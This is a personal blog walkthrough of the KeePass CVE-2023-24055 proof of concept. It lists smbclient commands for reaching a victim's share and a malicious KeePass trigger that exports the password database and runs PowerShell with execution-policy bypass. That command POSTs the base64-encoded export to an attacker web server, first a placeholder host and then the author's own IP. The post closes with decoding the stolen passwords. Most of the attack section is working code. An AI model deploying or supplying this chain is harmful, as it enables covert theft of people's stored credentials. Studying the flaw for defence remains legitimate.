CVE-2023-24055 KeePass 2.5x

Security CVE
Created At :
Count:378 Views 👀 :
  1. Connect to the target
  2. Download the config
  3. Add a trigger
  4. Put it back in the target.
  5. Create a web server
  6. Decode

I’m not the author of this POC.
https://github.com/alt3kx/CVE-2023-24055_PoC

Connect to the target

Show directories.

smbclient -L //192.168.1.182

Connect to shared directory.

smbclient \\\\192.168.1.182\\Roaming

Download the config

get KeePass\KeePass.config.xml

This is how looks like the file.

Add a trigger

The POC:

<Triggers>
		<Trigger>
			<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
			<Name>exploit</Name>
			<Events>
				<Event>
					<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
					<Parameters>
						<Parameter>0</Parameter>
						<Parameter />
					</Parameters>
				</Event>
			</Events>
			<Conditions />
			<Actions>
				<Action>
					<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
					<Parameters>
						<Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter> # This one
						<Parameter>KeePass XML (2.x)</Parameter>
						<Parameter />
						<Parameter />
					</Parameters>
				</Action>
				<Action>
					<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
					<Parameters>
						<Parameter>PowerShell.exe</Parameter>
						<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter> # And this one
						<Parameter>False</Parameter>
						<Parameter>1</Parameter>
						<Parameter />
					</Parameters>
				</Action>
			</Actions>
		</Trigger>
	</Triggers>

I have to change 2 lines.
The first one to replace by the user of the windows.
The second for the same ting + give the address of the web server.
This is my version:

...
					<Parameters>
						<Parameter>c:\Users\peanutstick\AppData\Local\Temp\exploit.xml</Parameter> # This one
						<Parameter>KeePass XML (2.x)</Parameter>
...
...
						<Parameter>PowerShell.exe</Parameter>
						<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://192.168.1.69:1337/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\peanutstick\AppData\Local\Temp\exploit.xml'))) </Parameter> # And this one
						<Parameter>False</Parameter>
						...

Put it back in the target.

Create a web server

We need a web server where we can user PUT method.
This one is good:
https://gist.github.com/mdonkers/63e115cc0c79b4f6b8b3a6b797e485c7
Now we have to open it and wait, the windows user need to save a new password

And Voila, with the file in base 64

Decode

echo "string" | base64 -d > passwords.txt

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme